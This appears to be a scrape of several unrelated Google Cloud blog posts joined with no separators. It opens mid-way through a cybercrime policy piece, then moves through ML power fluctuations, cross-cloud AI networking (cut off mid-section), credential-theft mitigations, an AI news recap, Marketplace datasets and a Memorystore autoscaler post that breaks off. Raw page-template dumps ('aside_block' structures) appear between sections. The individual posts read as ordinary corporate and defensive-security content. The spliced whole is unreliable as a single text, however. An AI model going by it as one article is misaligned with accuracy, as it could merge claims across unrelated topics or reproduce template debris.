We believe tackling this challenge will require a new and stronger approach recognizing the cybercriminal threat as a national security priority requiring international cooperation. While some welcome enhancements have been made in recent years, more must—and can—be done. The structure of the cybercrime ecosystem makes it particularly resilient to takedowns. Financially motivated actors tend to specialize in a single facet of cybercrime and regularly work with others to accomplish bigger schemes. While some actors may repeatedly team up with particular partners, actors regularly have multiple suppliers (or customers) for a given service.
If a single ransomware-as-a-service provider is taken down, many others are already in place to fill in the gap that has been created. This resilient ecosystem means that while individual takedowns can disrupt particular operations and create temporary inconveniences for cybercriminals, these methods need to be paired with wide-ranging efforts to improve defense and crack down on these criminals’ ability to carry out their operations. We urge policymakers to consider taking a number of steps:
Demonstrably elevate cybercrime as a national security priority: Governments must recognize cybercrime as a pernicious national security threat and allocate resources accordingly. This includes prioritizing intelligence collection and analysis on cybercriminal organizations, enhancing law enforcement capacity to investigate and prosecute cybercrime, and fostering international cooperation to dismantle these transnational networks.
Strengthen cybersecurity defenses: Policymakers should promote the adoption of robust cybersecurity measures across all sectors, particularly critical infrastructure. This includes incentivizing the implementation of security best practices, investing in research and development of advanced security technologies, enabling digital modernization and uptake of new technologies that can advantage defenders, and supporting initiatives that enhance the resilience of digital systems against attacks and related deceptive practices.
Disrupt the cybercrime ecosystem: Targeted efforts are needed to disrupt the cybercrime ecosystem by targeting key enablers such as malware developers, bulletproof hosting providers, and financial intermediaries such as cryptocurrency exchanges. This requires a combination of legal, technical, and financial measures to dismantle the infrastructure that supports cybercriminal operations and coordinated international efforts to enable the same.
Enhance international cooperation: cybercrime transcends national borders, necessitating strong international collaboration to effectively combat this threat. Policymakers should prioritize and resource international frameworks for cyber threat information sharing, joint investigations, and coordinated takedowns of cybercriminal networks, including by actively contributing to the strengthening of international organizations and initiatives dedicated to combating cybercrime, such as the Global Anti-Scams Alliance (GASA). They should also prioritize collective efforts to publicly decry malicious cyber activity through joint public attribution and coordinated sanctions, where appropriate.
Empower individuals and businesses: Raising awareness about cyber threats and promoting cybersecurity education is crucial to building a resilient society. Policymakers should support initiatives that educate individuals and businesses about online safety, encourage the adoption of secure practices, empower service providers to take action against cybercriminals including through enabling legislation, and provide resources for reporting and recovering from cyberattacks.
Elevate strong private sector security practices: Ransomware and other forms of cybercrime predominantly exploit insecure, often legacy technology architectures. Policymakers should consider steps to prioritize technology transformation, including the adoption of technologies/products with a strong security track record; diversifying vendors to mitigate risk resulting from overreliance on a single technology; and requiring interoperability across the technology stack.
aside_block
<ListValue: [StructValue([(‘title’, ‘The Evolution of Cybercrime’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb5935d2e20>), (‘btn_text’, ‘Watch now’), (‘href’, ‘https://www.youtube.com/watch?v=NtANWZPHUak’), (‘image’, <GAEImage: evolution of cybercrime>)])]>
About the Authors
Google Threat Intelligence Group brings together the Mandiant Intelligence and Threat Analysis Group (TAG) teams, and focuses on identifying, analyzing, mitigating, and eliminating entire classes of cyber threats against Alphabet, our users, and our customers. Our work includes countering threats from government-backed attackers, targeted 0-day exploits, coordinated information operations (IO), and serious cybercrime networks. We apply our intelligence to improve Google’s defenses and protect our users and customers.
The recent explosion of machine learning (ML) applications has created unprecedented demand for power delivery in the data center infrastructure that underpins those applications. Unlike server clusters in the traditional data center, where tens of thousands of workloads coexist with uncorrelated power profiles, large-scale batch-synchronized ML training workloads exhibit substantially different power usage patterns. Under these new usage conditions, it is increasingly challenging to ensure the reliability and availability of the ML infrastructure, as well as to improve data-center goodput and energy efficiency.
Google has been at the forefront of data center infrastructure design for several decades, with a long list of innovations to our name. In this blog post, we highlight one of the key innovations that allowed us to manage unprecedented power and thermal fluctuations in our ML infrastructure. This innovation underscores the power of full codesign across the stack — from ASIC chip to data center, across both hardware and software. We also discuss the implications of this approach and propose a call to action for the broader industry.
New ML workloads lead to new ML power challenges
Today’s ML workloads require synchronized computation across tens of thousands of accelerator chips, together with their hosts, storage, and networking systems; these workloads often occupy one entire data-center cluster — or even multiples of them. The peak power utilization of these workloads could approach the rated power of all the underlying IT equipment, making power overscription much more difficult. Furthermore, power consumption rises and falls between idle and peak utilization levels much more steeply, due to the fact that the entire cluster’s power usage is now dominated by no more than a few large ML workloads. You can observe these power fluctuations when a workload launches or finishes, or when it is halted, then resumed or rescheduled. You may also observe a similar pattern when the workload is running normally, mostly attributable to alternating compute- and networking-intensive phases of the workload within a training step. Depending on the workload’s characteristics, these inter- and intra-job power fluctuations can occur very frequently. This can result in multiple unintended consequences on the functionality, performance, and reliability of the data center infrastructure.
Fig. 1. Large power fluctuations observed on cluster level with large-scale synchronized ML workloads
In fact, in our latest batch-synchronous ML workloads running on dedicated ML clusters, we observed power fluctuations in the tens of megawatts (MW), as shown in Fig.1. And compared to a traditional load variation profile, the ramp speed could be almost instantaneous, repeat as frequently as every few seconds, and last for weeks… or even months!
Fluctuations of this kind pose the following risks:
Functionality and long-term reliability issues with rack and data center equipment, resulting in hardware-induced outages, reduced energy efficiency and increased operational/maintenance costs, including but not limited to rectifiers, transformers, generators, cables and busways
Damage, outage, or throttling at the upstream utility, including violation of contractual commitments to the utility on power usage profiles, and corresponding financial costs
Unintended and frequent triggering of the uninterrupted power supply (UPS) system from large power fluctuations, resulting in shortened lifetime of the UPS system
Large power fluctuations may also impact hardware reliability at a much smaller per-chip or per-system scale. Although the maximum temperature is well under control, power fluctuations may still translate into large and frequent temperature fluctuations, triggering various forms of interactions including warpage, changes to thermal interface material property, and electromigration.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e3758e60460>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
A full-stack approach to proactive power shaping
Due to the high complexity and large scale of our data-center infrastructure, we posited that proactively shaping a workload’s power profile could be more efficient than simply adapting to it. Google’s full codesign across the stack — from chip to data center, from hardware to software, and from instruction set to realistic workload — provides us with all the knobs we need to implement highly efficient end-to-end power management features to regulate our workloads’ power profiles and mitigate detrimental fluctuations.
Specifically, we installed instrumentation in the TPU compiler to check on signatures in the workload that are linked with power fluctuations, such as sync flags. We then dynamically balance the activities of major compute blocks of the TPU around these flags to smooth out their utilization over time. This achieves our goal of mitigating power and thermal fluctuations with negligible performance overhead. In the future, we may also apply a similar approach to the workload’s starting and completion phases, resulting in a gradual, rather than abrupt, change in power levels.
We’ve now implemented this compiler-based approach to shaping the power profile and applied it on realistic workloads. We measured the system’s total power consumption and a single chip’s hotspot temperature with, and without, the mitigation, as plotted in Fig. 2 and Fig. 3, respectively. In the test case, the magnitude of power fluctuations dropped by nearly 50% from the baseline case to the mitigation case. The magnitude of temperature fluctuations also dropped from ~20 C in the baseline case to ~10 C in the mitigation case. We measured the cost of the mitigation by the increase in average power consumption and the length of the training step. With proper tuning of the mitigation parameters, we can achieve the benefits of our design with small increases in average power with <1% performance impact.
Fig. 2. Power fluctuation with and without the compiler-based mitigation
Fig. 3. Chip temperature fluctuation with and without the compiler-based mitigation
A call to action
ML infrastructure is growing rapidly and expected to surpass traditional server infrastructure in terms of total power demand in the coming years. At the same time, ML infrastructure’s power and temperature fluctuations are unique and tightly coupled with the ML workload’s characteristics. Mitigating these fluctuations is just one example of many innovations we need to ensure reliable and high-performance infrastructure. In addition to the method described above, we’ve been investing in an array of innovative techniques to take on ever-increasing power and thermal challenges, including data center water cooling, vertical power delivery, power-aware workload allocation, and many more.
But these challenges aren’t unique to Google. Power and temperature fluctuations in ML infrastructure are becoming a common issue for many hyperscalers and cloud providers as well as infrastructure providers. We need partners at all levels of the system to help:
Utility providers to set forth a standardized definition of acceptable power quality metrics — especially in scenarios where multiple data centers with large power fluctuations co-exist within a same grid and interact with one another
Power and cooling equipment suppliers to offer quality and reliability enhancements for electronics components, particularly for use-conditions with large and frequent power and thermal fluctuations
Hardware suppliers and data center designers to create a standardized suite of solutions such as rack-level capacitor banks (RLCB) or on-chip features, to help establish an efficient supplier base and ecosystem
ML model developers to consider the energy consumption characteristics of the model, and consider adding low-level software mitigations to help address energy fluctuations
Google has been leading and advocating for industry-wide collaboration on these issues through forums such as Open Compute Project (OCP) to benefit the data center infrastructure industry as a whole. We look forward to continuing to share our learnings and collaborating on innovative new solutions together.
A special thanks to Denis Vnukov, Victor Cai, Jianqiao Liu, Ibrahim Ahmed, Venkata Chivukula, Jianing Fan, Gaurav Gandhi, Vivek Sharma, Keith Kleiner, Mudasir Ahmad, Binz Roy, Krishnanjan Gubba Ravikumar, Ashish Upreti and Chee Chung from Google Cloud for their contributions.
At Google Cloud, we strive to make it easy to deploy AI models onto our infrastructure. In this blog we explore how the Cross-Cloud Network solution supports your AI workloads.
Managed and Unmanaged AI options
Google Cloud provides both managed (Vertex AI) and do-it-yourself (DIY) approaches for running AI workloads.
Vertex AI: A fully managed machine learning platform. Vertex AI offers both pre-trained Google models and access to third-party models through Model Garden. As a managed service, Vertex AI handles infrastructure management, allowing you to concentrate on training, tuning, and inferencing your AI models.
Custom infrastructure deployments: These deployments utilize various compute, storage and networking options based on the type of workload the user is running. AI Hypercomputer is one way to deploy both HPC workloads that may not require GPU and TPUs, and also AI workloads running TPUs or GPUs.
Networking for managed AI
With Vertex AI you don’t have to worry about the underlying infrastructure. For network connectivity by default the service is accessible via public API. Enterprises that want to use private connectivity have a choice of Private Service Access, Private Google Access, Private Service Connect endpoints and Private Service Connect for Google APIs. The option you choose will vary based on the specific Vertex AI service you are using. You can learn more in the Accessing Vertex AI from on-premises and multicloud documentation.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 to try Google Cloud networking’), (‘body’, <wagtail.rich_text.RichText object at 0x3e75542520d0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/products?#networking’), (‘image’, None)])]>
Networking AI infrastructure deployments
An organization has data located in another cloud, and would like to deploy an AI cluster with GPUs on Google Cloud. Let’s look at a sample case.
Based on this need, you need to analyze the networking based on planning, data ingestion, training and inference.
Planning: This crucial initial phase involves defining your requirements, the size of the cluster (number of GPUs), the type of GPUs needed, the desired region and zone for deployment, storage and anticipated network bandwidth for transfers. This planning informs the subsequent steps. For instance, training large language models like LLaMA which has billions of parameters requires a significantly larger cluster than fine-tuning smaller models.
Data ingestion: Since the data is located in another cloud, you need a high-speed connection so that the data can be accessed directly or transferred to a storage option in Google Cloud. To facilitate this, Cross-Cloud Interconnect offers a direct connection at high bandwidth with a choice of 10Gbps or 100Gbps per link. Alternatively if the data is located on-premises, you can use Cloud Interconnect.
Training: Training workloads demand high-bandwidth, low-latency, and lossless cluster networking. You can achieve GPU-to-GPU communication that bypasses the system OS with Remote Direct Memory Access (RDMA). Google Cloud networking supports the RDMA over converged ethernet (RoCE) protocol in special network VPCs using the RDMA network profile. Proximity is important so nodes and clusters need to be as close to each other as possible for best performance.
Threat actors who target cloud environments are increasingly focusing on exploiting compromised cloud identities. A compromise of human or non-human identities can lead to increased risks, including cloud resource abuse and sensitive data exfiltration. These risks are exacerbated by the sheer number of identities in most organizations; as they grow, the attack surface they represent also grows.
As described in the latest Google Cloud Threat Horizons Report, organizations should prioritize measures that can strengthen identity protection.
“We recommend that organizations incorporate automation and awareness strategies such as strong password policies, mandatory multi-factor authentication, regular reviews of user access and cloud storage bucket security, leaked credential monitoring on the dark web, and account lockout mechanisms,” said Iain Mulholland, senior director, Security Engineering, in last week’s Cloud CISO Perspectives newsletter.
Today, we are detailing key risk mitigations from Google Cloud security experts that you can quickly act on. Every organization should evaluate these mitigations as part of their efforts to protect their cloud deployments.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7554258a90>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Google Cloud’s built-in protections
Google Cloud provides always-on account protection measures that help mitigate credential theft. Many of these protections are based on heuristics that detect likely credential theft and terminate an attacker’s session. Others limit the use of suspected stolen cookies to minutes, instead of hours.
Google Cloud requires users to reauthenticate to confirm the validity of their credentials before allowing many sensitive actions in the Cloud Console. This reauthentication can happen deterministically or based on a risk score.
Google Cloud sets default Organization Policies on newly created organizations to guard against common risks of service credential theft and sharing of resources.
However, as attacker tactics evolve, it’s important to have additional layers of defense in place spanning multi-factor authentication (MFA), protecting sessions, protecting service credentials, identity and access controls, and security monitoring.
Google Cloud customers are encouraged to adopt the following measures to help increase protection against credential theft:
Multi-factor authentication (MFA): As part of our shared fate approach to help customers, we recently described our plans to make MFA mandatory for all Google Cloud users this year. If you have not enabled MFA yet, you can take these steps in advance of mandatory enforcement:
Enable MFA on your primary Identity Provider (IdP). For Google Cloud customers who use Google Cloud Identity as their primary IdP, follow these instructions.
Add an MFA instrument to Google Cloud Identity accounts for re-authentication. If Google Cloud Identity is not your primary IdP, this provides an independent layer of verification prior to allowing sensitive actions. Follow these instructions.
Configure your IdP to always challenge (ideally with MFA) when accessing Google. When Google Cloud customers use Cloud Identity with their own IdP through SAML or OIDC, Cloud Identity queries the IdP for an attestation when the session expires or when Google Cloud requires re-authentication. In the default configuration, IdPs silently approve all these attestations to minimize user friction. However, most IdPs can be configured to always require re-entering credentials, and even to always require MFA whenever Google Cloud requests an attestation. This configuration can be set up to only apply to the app representing Google Cloud, and not for all apps that the IdP federates for a smoother user and administrative experience.
Protecting sessions: We recommend four controls that can help increase session protection:
Limiting session length can reduce the usefulness of stolen cookies. The default session length is 16 hours, and is user-configurable. Here are instructions for setting session length, and you can read more on session length management.
Limiting IPs allowed to access Cloud Console and APIs with Context-Aware Access (CAA) can make stolen credentials useless (unless the attacker has access to allowlisted IPs, such as the corporate network or VPN IPs.)
Certificate-based access can be used to require mTLS certificates to access Cloud Console and Google Cloud APIs. mTLS provides strong protection against cookie theft, requiring users to present an mTLS certificate in addition to existing credentials such as cookies. mTLS certificates are typically stored in the Trusted Platform Module (TPM) of the user’s device, making them extremely difficult for an attacker to steal. Many enterprises already deploy mTLS certificates to their users, and Google Cloud allows customers to either reuse their existing mTLS certificates, or use new ones just for Google Cloud.
Contextual-access restrictions can be configured with Access Context Manager, which allows Google Cloud organization administrators to define fine-grained, attribute based access control for projects and resources. Access levels can be configured to require additional device and user attributes to be met in order for a resource request to be successful. For example, you can require that a corporate-managed be used to access and configure resources.
Protecting service credentials: Organizations should also build layered protection for non-human identities. Google Cloud offers detailed best practices for managing, using, and securing service account keys and API keys. Three important controls to consider:
Disable creation of service account keys: This Organization Policy setting prevents users from creating persistent keys for service accounts. Instead of allowing unqualified use of service account keys, choose the right authentication method for your use case, and allow exceptions for service account keys only for scenarios that cannot use more secure alternatives.
Disable leaked service account keys automatically: Google Cloud regularly scans public repositories (including Github and Gitlab) for leaked service account keys. If Google Cloud detects an exposed key, it will automatically disable the key. It also creates a Cloud Audit Logs event and sends a notification about the exposed key to project owners and security contacts. We strongly recommend not modifying the DISABLE_KEY option (which is on by default).
Binding service account keys to trusted networks: Context Aware Access for service accounts enables customers to bind service accounts to an IP-range or specific VPC networks, and enforce that service accounts can access Google Cloud services and APIs only from these trusted networks. Customers can request early access to this control using this form.
Identity and access controls: Adhering to the principle of least privilege can help limit the impact of credential compromise; use these controls to limit access and privileges to only what users need to perform their job functions.
Google Cloud Identity and Access Management (IAM) lets you grant granular access to specific Google Cloud resources and can help prevent access to other resources. Permissions are grouped into roles, and roles are granted to authenticated principals. You shouldregularly review and right-size permissions using tools such as IAM Recommender. The Google Cloud Architecture Framework provides additional best practices for managing identity and access.
VPC Service Controls enable a powerful, context-aware approach to control access for your cloud resources. You can create granular access control policies based on attributes such as user identity and IP address. These policies ensure specific security controls are in place before granting access to cloud resources from untrusted networks. By allowing access only from authorized networks, VPC Service Controls helps protect against the risk of data exfiltration presented by clients using stolen OAuth or service account credentials.
Principal access boundaries can precisely define the resources that a principal is eligible to access. If a policy makes a principal ineligible to access a resource, then their access to that resource is limited regardless of the roles they’ve been granted.
Restrict identities by domain using domain-restricted sharing to limit role grants to users belonging to a specific domain or organization. When domain restricted sharing is active, only principals that belong to allowed domains or organizations can be granted IAM roles in your Google Cloud organization.
Security monitoring: In addition to implementing preventative controls, you should proactively monitor your cloud environment for signs of compromise. Early detection can help limit the business impact of a compromise.
Security Command Center (SCC) is Google Cloud’s built-in security and risk management platform. It provides comprehensive security posture management, threat detection, and compliance monitoring.
With SCC’s Cloud Infrastructure Entitlement Management (CIEM) capabilities, you can manage which identities have access to which resources in your deployments, mitigate potential vulnerabilities that result from misconfigurations, and enforce the principle of least privilege. The Sensitive Actions Service within SCC automatically detects and alerts on potentially damaging actions occurring across your cloud organization, folders, and projects. SCC’s Virtual Red Teaming capability continuously detects if high value resources are exposed and surfaces the identities and access paths that could lead to compromise.
Next steps
Maintaining a strong security posture requires ongoing evaluation of the risks your organization faces, and the controls you have in place to address them. These recommendations can help you strengthen your cloud estate against the growing risks associated with credential compromise.
You can learn more about protecting your Google Cloud deployments in our security Best Practices Center.
2025 is off to a racing start. From announcing strides in the new Gemini 2.0 model family to retailers accelerating with Cloud AI, we spent January investing in our partner ecosystem, open-source, and ways to make AI more useful. We’ve heard from people everywhere, from developers to CMOs, about the pressure to adapt the latest in AI with efficiency and speed – and the delicate balance of being both conservative and forward-thinking. We’re here to help. Each month, we’ll post a retrospective that recaps Google Cloud’s latest announcements in AI – and importantly, how to make the most of these innovations.
Top announcements: Bringing AI to you
This month, we announced agent evaluation in Vertex AI. A surprise to nobody, AI agents are top of mind for many industries looking to deploy their AI and boost productivity. But closing the gap between impressive model demos and real-world performance is crucial for successfully deploying generative AI. That’s why we announced Vertex AI’s RAG Engine, a fully managed service that helps you build and deploy RAG implementations with your data and methods. Together, these new innovations can help you build reliable, trustworthy models.
From an infrastructure perspective, we announcednew updates to AI Hypercomputer. We wanted to make it easier for you to run large multi-node workloads on GPUs by launching A3 Ultra VMs and Hypercompute Cluster, our new highly scalable clustering system. This builds on multiple advancements in AI infrastructure, including Trillium, our sixth-generation TPU.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9f3e8cf730>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
At the same time, we shared several important announcements in the world of open-source. We announced Mistral AI’s Mistral Large 24.11 and Codestral 25.01 models on Vertex AI. These models will help developers write code and build faster – from high-complexity tasks to reasoning tasks, like creative writing. To help you get started, we providedsample codeanddocumentation.
And, most recently, we announced the public beta of Gen AI Toolbox for Databasesin partnership with LangChain, the leading orchestration framework for developers building LLM applications. Toolbox is an open-source server that empowers application developers to connect production-grade, agent-based generative AI applications to databases. You can get started here.
Industry news: Google Cloud at the National Retail Federation (NRF)
The National Retail Federation kicked off the year with their annual NRF conference, where Google Cloud showed how AI agents and AI-powered search are already helping retailers operate more efficiently, create personalized shopping experiences, and use AI to get the latest products and experiences to their customers. Check our new AI tools to help retailers build gen AI search and agents.
As an example, Google Cloud worked with NVIDIA to empower retailers to boost their customer engagements in exciting new ways, deliver more hyper-personalized recommendations, and build their own AI applications and agents. Now with NVIDIA’s AI Enterprise software available on Google Cloud, retailers can handle more data and more complex AI tasks without their systems getting bogged down.
News you can use
This month, we shared several ways to better implement fast-moving AI, from a comprehensive guide on Supervised Fine Tuning (SFT), to how developers can help their LLMs deliver more accurate, relevant, and contextually aware responses, minimizing hallucinations and building trust in AI applications by optimizing their RAG retrieval.
We also published new documentation to use open models in Vertex AI Studio. Model selection isn’t limited to Google’s Gemini anymore. Now, choose models from Anthropic, Meta, and more when writing or comparing prompts.
Hear from our leaders
We closed out the month with The Prompt, our monthly column that brings observations from the field of AI. This month, we heard from Warren Barkley, AI product leader, who shares some best practices and essential guidance to help organizations successfully move AI pilots to production. Here’s a snippet:
More than 60% of enterprisesare now actively using gen AI in production, helping to boost productivity and business growth, bolster security, and improve user experiences. In the last year alone, we witnessed a staggering 36x increase in Gemini API usage and a nearly 5x increase of Imagen API usage on Vertex AI — clear evidence that our customers are making the move towards bringing gen AI to their real-world applications.
Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud, read our weekly updates, The Overwhelmed Person’s Guide to Google Cloud.
We are excited to announce the availability of datasets on Google Cloud Marketplace through BigQuery Analytics Hub, opening up new avenues for organizations to power innovative analytics use cases and procure data for enterprise business needs. As a centralized procurement platform, Google Cloud Marketplace offers access to a wide array of enterprise applications, foundational AI models, LLMs, and now, commercial and free datasets from third-party data providers and Google. BigQuery Analytics Hub enables cross-organizational zero-copy sharing at scale, with governance, security, and encryption all built in natively.
This deep integration between Google Cloud Marketplace and Analytics Hub not only simplifies data procurement for customers, but also helps data providers extend reach to a global audience and unlock additional business opportunities. Let’s delve into the various benefits this development brings.
Streamlined data procurement for customers
The introduction of BigQuery datasets on Google Cloud Marketplace offers numerous advantages for customers looking to access high-quality datasets to power analytics, AI and to optimize business applications. We offer a wide variety of datasets, including commercial data products from leading providers such as Dun & Bradstreet, Equifax, and Weather Source, a Pelmorex company. Data teams can now easily find, buy, and consume datasets from a centralized, comprehensive catalog — the same place where they discover generative AI, analytics and business applications that integrate with or run on Google Cloud. By simplifying the data discovery and procurement process, businesses can allocate their resources more efficiently, reduce administrative burden, and accelerate data and AI-driven initiatives. Dataset purchased from the Google Cloud Marketplace can draw down the customer’s Google Cloud commitment.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e9ad2af9490>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Immediate access to purchased data
Upon purchasing a dataset, customers can gain instant access to it within their BigQuery environment through Analytics Hub. By subscribing to a purchased BigQuery dataset in Analytics Hub, a linked dataset is immediately created in the customer’s own Google Cloud project. This allows businesses to swiftly integrate procured data with their own data without requiring data movement or replication, expedite analytical processes, and accelerate time-to-value. By eliminating the delays commonly associated with data procurement and by streamlining data delivery time, organizations can quickly leverage the acquired data to inform strategic decisions and drive innovation.
Cost control, security and governance
Customers procuring datasets through Google Cloud Marketplace can benefit significantly from cost savings, as linked datasets in Analytics Hub are live pointers to shared data and require no data copying, and there are no extra replication or storage costs to account for. In addition, customers can reduce billing sprawl with consolidated billing for Google Cloud services, third-party ISV solutions, and now datasets. A recent Google Cloud commissioned IDC study1 found that Google Cloud Marketplace can help customers lower spending on third-party solutions by 21.2% on average, largely due to avoiding unnecessary purchases, reducing duplicative spend, and leveraging committed spend discounts. Customers gain cost efficiencies and improved time-to-value opportunities by consolidating contracts across their entire organization.
On the security front, Google Cloud provides robust features to support data protection. Analytics Hub natively supports provider and subscriber project isolation, helping to ensure that commercial data can be safely shared across organizational boundaries. Customers can also apply specific security configurations via BigQuery and Analytics Hub, including Virtual Private Cloud Service Controls support, allowing for tailored access controls to help safeguard from unauthorized access.
Furthermore, organizations can maintain governance and control over the solutions in use by turning on the Google Cloud Private Marketplace capability, enabling a curated collection of trusted products — including datasets — that can be discovered, procured and used by their data analyst teams. With Private Marketplace, administrators can maintain control over which datasets are used, yet also ensure that governance controls do not hinder productivity by turning on the ability for end-users to request additional products be made available. The same IDC study found that managing third-party software purchases through Google Cloud Marketplace can result in 31% productivity gains for compliance teams1.
Data providers extend reach to customers
Data provider partners get significant advantages by listing their offerings on Google Cloud Marketplace, gaining access to a wider customer base, facilitating market expansion and business growth. With a streamlined onboarding process, data providers can create new revenue channels by efficiently making their datasets available to new customers.
Once the transaction is completed in Google Cloud Marketplace, Analytics Hub automatically enables customer access to the data provider’s data, minimizing friction for sellers and customers. In addition, the integration with Analytics Hub means data updates are propagated instantly, so that end users have access to the most current information, enhancing customer satisfaction and loyalty. Google Cloud Marketplace supports dataset transactions via the agency model, which at the time of this announcement is enabled for customers and partners based in France, Germany, the United Kingdom, and the United States.
Unlock monetization opportunities
Google Cloud Marketplace opens up various monetization opportunities for data provider partners. Those who already have data in BigQuery can quickly share at scale with Analytics Hub, commercialize, list, and unlock new income streams through Google Cloud Marketplace. Integration opportunities between Analytics Hub and Google Cloud Marketplace further enable partners to capitalize on the intrinsic value of their data, expanding their monetization strategies and maximizing revenue potential.
Partners have the flexibility to transact with customers via public, off-the-shelf pricing or through custom-negotiated private offers. They can set up fixed-fee subscriptions and customize payment schedules for data offerings without needing complex technical integrations, simplifying the process of generating revenue. Leverage Google Cloud’s standard agreements or provide your own. Finally, with Analytics Hub usage metrics and subscription management, data providers can easily analyze usage behavior, identify patterns, and add or revoke subscriptions, all within a single pane of glass. And if they execute campaigns to drive traffic to Google Cloud Marketplace dataset offerings, they can track traffic and conversion in the Analytics dashboard within Google Cloud Marketplace Producer Portal. Whether it’s through fixed subscriptions or through offering advanced data services, partners have numerous ways to monetize data effectively on our platform.
Data provider partners are excited about the business opportunities and customer use cases that BigQuery datasets on Google Cloud Marketplace can help deliver.
“Driving adoption of Dun & Bradstreet data through joint-go-to-market is a key pillar of our partnership with Google Cloud. We are excited about the ability for our mutual customers to seamlessly transact Dun & Bradstreet’s high-quality and trusted data on the Google Cloud Marketplace and immediately unlock powerful analytics and real-time insights. Having more of our AI-ready data on BigQuery helps organizations be deliberate about their data strategy.” – Isabel Gomez Vidal, Chief Revenue Office, Dun & Bradstreet
“Our collaboration with Google Cloud to make Equifax data available on Google Cloud Marketplace and Analytics Hub represents a significant step forward in data accessibility. By leveraging this platform, our customers can now integrate Equifax insights seamlessly into their existing workflows, driving innovation and informed decision-making.” – Felipe Castillo, Chief Product Officer, US Information Solutions, Equifax
“We are proud to be an early adopter of the Google Cloud Marketplace and we are looking forward to building upon our initial success leveraging the integrated functionality in BigQuery. Google Cloud Marketplace has accelerated lead capturing, procurement, and delivery of our data assets, allowing our teams to focus on unlocking business opportunities with our mutual customers.” – Craig Stelmach, Senior Vice President of Business Development and Sales, Weather Source, a Pelmorex Company
Analytics Hub and Google Cloud Marketplace are helping to reshape the landscape of how customers and data providers make the most out of data to power the next generation of AI and enterprise use cases. Learn more about Analytics Hub and explore datasets on Google Cloud Marketplace.
One of the most compelling aspects of cloud computing is being able to automatically scale resources up, but almost as importantly, to scale them back down to manage costs and performance. This is standard practice with virtual machines, for instance Compute Engine Managed Instance Groups, but because of their inherent complexity, less so with stateful services such as databases.
Memorystore for Redis Cluster capacity is determined by the number of shards in your cluster, which can be increased/decreased without downtime, and your cluster’s shard size, which maps on to the underlying node type. At this time, the node type of the cluster is immutable. To scale capacity in or out, you modify the number of shards in your cluster. To automate this process, you can deploy the Memorystore Cluster Autoscaler to monitor your cluster metrics, and rightsize your cluster based on that information. The Autoscaler performs the necessary resource adjustments using rulesets that evaluate memory and CPU utilization, without impacting cluster availability.
The following chart shows the Autoscaler in action, with a Memorystore for Redis Cluster instance automatically scaling out as memory utilization increases. The green line represents data being written to the cluster at the rate of one gigabyte every five minutes. The blue line represents the number of shards in the cluster. You can see that the cluster scales out, with the number of shards increasing in proportion to the memory utilization, then plateaus when the writes stop, and finally scales back in when the keys are flushed at the end of the test.
Experience and deployment
To use the Autoscaler, deploy it to one of your Google Cloud projects. The Autoscaler is very flexible and there are multiple options for its deployment, so the repository contains multiple example Terraform deployment configurations, as well as documentation that describes the various deployment models.
Once you’ve deployed the Autoscaler, configure it according to the scaling requirements of the Memorystore instances being managed, to suit your workloads’ characteristics. You do this by setting Autoscaler configuration parameters for each of the Memorystore instances. Once configured, the Autoscaler autonomously manages and scales the Memorystore instances. You can read more about these parameters later in this post, and in the Autoscaler documentation.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e4df7d14c70>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Autoscaler architecture
The Autoscaler consists of two main components, the Poller and the Scaler. You can deploy these to either Cloud Run functions or Google Kubernetes Engine (GKE) via Terraform, and configure them so that the Autoscaler runs according to a user-defined schedule. The Poller queries the Memorystore metrics in Cloud Monitoring at a pre-defined interval to determine utilization, and passes them to the Scaler. The Scaler then compares the metrics against the recommended thresholds specified in the rule set, and determines if the instance should be scaled in or out, and if so, by how many shards. You can modify the sample configuration to determine minimum and maximum cluster sizes and any other thresholds suitable for your environment.
Throughout the flow, the Autoscaler writes a step-by-step summary of its recommendations and actions to Cloud Logging for tracking and auditing, as well as metrics to Cloud Monitoring to provide insight into its actions.
Scaling rubrics
Memorystore performance is most commonly limited by in-memory storage and by CPU. The Autoscaler is configured by default to take both of these factors into consideration when scaling, by utilizing the CPU_AND_MEMORY profile. This is a good place to start your deployment, and can be replaced with a custom configuration, if required, to best suit your needs.
Defaults
Metric
Average Default Setting
Max Default Setting
CPU scale OUT
CPU > 70%
Max CPU > 80% and average CPU > 50%
CPU scale IN
CPU < 50% *
Max CPU < 60% and average CPU < 40% *
Memory Scale OUT
Usage > 70%
Max Usage > 80% and average usage > 50%
Memory Scale IN
Usage < 50% *
Max Usage < 60% and average usage < 40% *
* Scale-in will be blocked if there are ongoing key evictions, which occur when the keyspace is full and keys are removed from the cache to make room. Scale in is enabled by default, but can be configured using a custom scaling profile. Refer to the Scaling Profiles section of the documentation for more information on how to do this.
Scaling scenarios and methods
Let’s take a look at some typical scenarios and their specific utilization patterns, and the Autoscaler configurations best suited to each of them. You can read more about the options described in the following section in the configuration documentation.
Standard workloads
With many applications backed by Memorystore, users interact with the application at certain times of day more than others, in a regular pattern — think a banking application where users check their accounts in the morning, make transactions during the afternoon and early evening, but don’t use the application much at night.
